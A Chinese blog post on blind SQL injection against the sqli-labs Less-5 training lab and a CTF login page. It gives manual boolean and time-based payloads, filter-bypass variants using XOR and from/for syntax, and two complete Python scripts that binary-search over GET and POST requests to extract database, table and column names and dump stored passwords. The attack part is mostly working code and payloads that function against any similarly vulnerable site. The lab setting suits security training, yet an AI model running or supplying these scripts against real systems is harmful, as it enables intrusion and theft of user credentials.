SQL盲注二分法注入脚本

原創 菜鸟-传奇 2022-01-11 14:35

sql盲注二分法注入脚本

此脚本可以用来检测sql靶场第五关

http://caichuanqi.cn/lab/sqli-labs-master/Less-5/?id=1

手工注入

猜测数据库
?id=1' and length(database())=8-- -
id=1' and left(database(),1)>'a' -- - 1
id=1' and left(database(),1)>'z' -- - 0
在a-z之间
id=1' and left(database(),1)>'r' -- -1
id=1' and left(database(),1)>'s' -- -0
id=1' and left(database(),2)>'sa'-- -

猜测表
id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit a,1),b,1))>n
a是从0开始第几个表,b是为第几个字符,n是ASCII所对应的十进制数
第一个表
ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 0,1),1,1))=101
ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 0,1),1,1))=101

第二个表
ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 1,1),1,1))=101

判断user表

http://localhost/Tkitn/sqlitest/Less-5/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='user' limit 0,1),1,1))>100%23

爆出字段
http://localhost/Tkitn/sqlitest/Less-5/?id=1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))=68-- -

盲注
时间盲注
?id=1' and sleep(5)-- -
?id=1' and if(length(database())>=8,sleep(5),1)-- -
盲注
1'^(ascii(substr((select database()),%d,1))<%d)^1#
括号 绕 空格
1'^(ascii(substr((select(database())),1,1))<1)^1#
逗号被过滤
1'^(ascii(substr((select(database()))from(1)for(1)))<1)^1#
for被过滤
1'^(ascii(substr((select(database()))from(1)))<1)^1#
MySQL|SUBSTR() 函数用法
https://zhuanlan.zhihu.com/p/110142732
布尔注入 改后面的数字
1'^(ascii(substr((select(database()))from(1)))<1)^1#
97 98 99 100
异或 ^ 绕 过 =
1^1=0 1^0=1 0^0=0
每个字符的ascii码判断,是否不等于给定的数字,会得到一个布尔值(0或1)再与结尾的0进行运算。

重点:构造payload:

"1'^(ascii(substr((select(database()))from(%d)))<%d)^1#"

"1'^(ascii(substr((select(database())),%d,1))<%d)^1#" 

"?id=1'^(ascii(substr((select(database())),%d,1))<%d)^1-- -"

"?id=1'^(ascii(mid((select(database())),%d,1))<%d)^1-- -"

SQL盲注get二分法布尔注入

#-*-coding:utf-8-*-
import requests
import time

#host = "http://web.jarvisoj.com:32787/login.php"
host = "http://127.0.0.1/sqlilabs/Less-5/?id=1"

def getDatabase():  #获取数据库名
    global host
    ans=''
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
            url= host +"?id=1'^(ascii(substr((select(database())),%d,1))<%d)^1-- -" % (i,mid)
            res = requests.get(url)
            if "You are in" in res.text:
                high = mid
            else:
                low = mid+1
            mid=(low+high)//2
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid-1)
        print("database is -> "+ans)


def getTable(): #获取表名
    global host
    ans=''
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
            url = host + "?id=1'^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))<%d)^1-- -" % (i,mid)
            res = requests.get(url)
            if "You are in" in res.text:
                high = mid
            else:
                low = mid+1
            mid=(low+high)//2
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid-1)
        print("table is -> "+ans)

def getColumn(): #获取列名
    global host
    ans=''
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
            #url = host + "id=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),%d,1))<%d)^1" % (i,mid)
         #   res = requests.get(url)
            url = host + "id=1'^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),%d,1))<%d)^1-- -" % (i,mid)
            res = requests.get(url)
            
            if "You are in" in res.text:
                high = mid
            else:
                low = mid+1
            mid=(low+high)//2
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid-1)
        print("column is -> "+ans)

def dumpTable():#脱裤
    global host
    ans=''
    for i in range(1,10000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
         #   url = host + "id=1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))<%d)^1" % (i,mid)
         #  res = requests.get(url)
            url = host + "id=1'^(ascii(substr((select(group_concat(password))from(users)),%d,1))<%d)^1-- -" % (i,mid)
            res = requests.get(url)
            if "You are in" in res.text:
                high = mid
            else:
                low = mid+1
            mid=(low+high)//2
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid-1)
        print("dumpTable is -> "+ans)
        
getDatabase()
getTable()
getColumn()
dumpTable()

sql盲注post二分法布尔注入

#-*-coding:utf-8-*-
import requests
import time

host = "http://web.jarvisoj.com:32787/login.php"
#host = "http://127.0.0.1/sqlilabs/Less-5/?id=1"

def getDatabase():  #获取数据库名
    global host
    ans=''
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
            #url= host +"?id=1'^(ascii(substr((select(database())),%d,1))<%d)^1-- -" % (i,mid)
            #res = requests.get(url)
            payload= "1'^(ascii(substr((select(database())),%d,1))<%d)^1#" % (i,mid)
            param ={"username":payload,"password":"admin"}
            res = requests.post(host,data=param)
            if "用户名错误" in res.text:
                high = mid
            else:
                low = mid+1
            mid=(low+high)//2
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid-1)
        print("database is -> "+ans)
        
def getTable(): #获取表名
    global host
    ans=''
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
           # url = host + "?id=1'^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))<%d)^1-- -" % (i,mid)
            #res = requests.get(url)
            payload= "1'^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))<%d)^1#" % (i,mid)
            param ={"username":payload,"password":"admin"}
            res = requests.post(host,data=param)
            if "用户名错误" in res.text:
                high = mid
            else:
                low = mid+1
            mid=(low+high)//2
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid-1)
        print("table is -> "+ans)
        
def getColumn(): #获取列名
    global host
    ans=''
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
            #url = host + "id=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='Flaaaaag')),%d,1))<%d)^1" % (i,mid)
            #res = requests.get(url)
            payload= "1'^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='admin')),%d,1))<%d)^1#" % (i,mid)
            param ={"username":payload,"password":"admin"}
            res = requests.post(host,data=param)
            if "用户名错误" in res.text:
                high = mid
            else:
                low = mid+1
            mid=(low+high)//2
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid-1)
        print("column is -> "+ans)
        
def dumpTable():#脱裤
    global host
    ans=''
    for i in range(1,10000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
            #url = host + "id=1'^(ascii(substr((select(group_concat(password))from(admin)),%d,1))<%d)^1-- -" % (i,mid)
            #res = requests.get(url)
            payload= "1'^(ascii(substr((select(group_concat(password))from(admin)),%d,1))<%d)^1#" % (i,mid)
            param ={"username":payload,"password":"admin"}
            res = requests.post(host,data=param)
            if "用户名错误" in res.text:
                high = mid
            else:
                low = mid+1
            mid=(low+high)//2
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid-1)
        print("dumpTable is -> "+ans)
        
getDatabase()
getTable()
getColumn()
dumpTable()
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

C#开源的两款功能强大的录屏神器

ScreenToGif ScreenToGif是一款由C#語言開發且開源的操作簡單、免費的屏幕錄製和GIF動畫製作神器。它可以幫助用戶捕捉計算機屏幕上的實時動畫,並將其保存爲高質量的 GIF 圖像格式。該工具不僅適用於技術支持、軟件演示和教

追逐時光 2024-05-03 14:28:27

前端 Vue yarn.lock文件:详解和使用指南

yarn.lock文件:詳解和使用指南 https://www.python100.com/html/38KF796X6BHM.html 一、什麼是yarn.lock文件 yarn.lock文件是一個產生於Yarn 0.22及以後版

emanlee 2024-05-03 14:15:26

前端 Vue webpack配置之 webpack.config.js 文件配置

  Webpack 在執行的時候,除了在命令行傳入參數,還可以通過指定的配置文件來執行。默認情況下,會搜索當前目錄的 webpack.config.js 文件,這個文件是一個 node.js 模塊,返回一個 json 格式的配置信息對象,或

emanlee 2024-05-03 14:15:26

Vue package-lock.json的作用

package-lock.json的作用   "node_modules/@aashutoshrathi/word-wrap": { "version": "1.2.6", "resolved": "h

emanlee 2024-05-03 14:15:26

前端 Vue-cli中 vue.config.js 的配置详解

Vue-cli 3 / Vue-cli 4   目錄結構 ├── README.md # 說明 |-- dist # 打包後文件夾 ├── babel.config.js

emanlee 2024-05-03 14:15:26

druid数据源 xml配置

https://blog.csdn.net/h273979586/article/details/87932220 pom依賴 <dependency> <groupId>com.alibaba</groupId>

tono 2024-05-03 14:14:55

Windows中Redis怎么设置密码

Windows中Redis怎麼設置密碼

久曲健 2024-05-03 14:11:15

JDK8和JDK17共存以及切换的方法

1、先安裝"jdk-8u381-windows-x64.exe",再安裝"jdk-17_windows-x64_bin.exe" 2、"系統屬性"-"高級"-"環境變量"-"系統變量"-"Path"-"編輯",刪除以下2條 C:\Progr

久曲健 2024-05-03 14:11:15

centos7修改redis密码

檢查Redis配置文件 首先,我們需要確保Redis的配置文件中包含了設置密碼的選項。打開Redis的配置文件/etc/redis.conf,查找以下行並確保取消註釋(去掉行首的#): requirepass your_password 啓

久曲健 2024-05-03 14:11:15

基于SSM的在线外卖订餐系统毕业设计论文【范文】

摘要 隨着互聯網技術的迅猛發展和人們生活節奏的加快,在線外賣訂餐系統因其便捷性和高效率而受到廣泛歡迎。本文圍繞《基於SSM框架的在線外賣訂餐系統》這一課題展開研究,旨在設計並實現一個功能全面、操作簡便且安全可靠的在線外賣訂餐平臺。 首先,文

Lucky帥小武 2024-05-03 14:08:24

基于CodeMirror开发在线编辑器时遇到的问题及解决方案

需求:實現json在線編輯並支持校驗,基於此使用了 CodeMirror在線編輯,jsonlint校驗輸入數據 // package.json: "dependencies": { "codemirror": "^5.53.2"

致愛麗絲 2024-05-03 14:04:44

《软件性能测试、分析与调优实践之路》(第2版) PPT课件流出

掃描圖書前言中的如下圖所示的二維碼,即可進入到下載頁面。  如下圖所示即爲課件的下載頁面,免費提供下載      

張永清 2024-05-03 14:01:24

2024年感想

  看了一眼之前到博客,最近的一次博客還在一年之前,時間如白駒過隙,飛快流逝。這兩年生活和工作都經歷裏很多,想想是應該在這裏好好梳理總結下。我總是感慨,自己從二十六七歲到現在三十多的年紀,好像經歷別人的半輩子,感悟衆多。   我以前是個朋友

兜兜有糖的博客 2024-05-03 13:57:53

AWS S3 Lambda Python脚本函数实现图片自动转换为webp并上传至s3

Amazon S3 自動轉換圖片格式  Amazon S3 存儲桶 新增文件自動觸發 AWS Lambda。Lambda 取 S3 文件做轉換並存回去 S3 同一個目錄下,並增加相應的後綴名。 並且支持通過API Gateway的方式觸發對

翎野 2024-05-03 13:51:42

Eclipse Memory Analyzer (MAT)的安装后提示JDK版本不对要升级到jdk_17

背景 在啓動MAT分析內存時報錯:Version1.8.0 of the jvm is not suitable for this product,Version17 or greater isrequired。 問題原因很明顯,我電腦的J

翎野 2024-05-03 13:51:42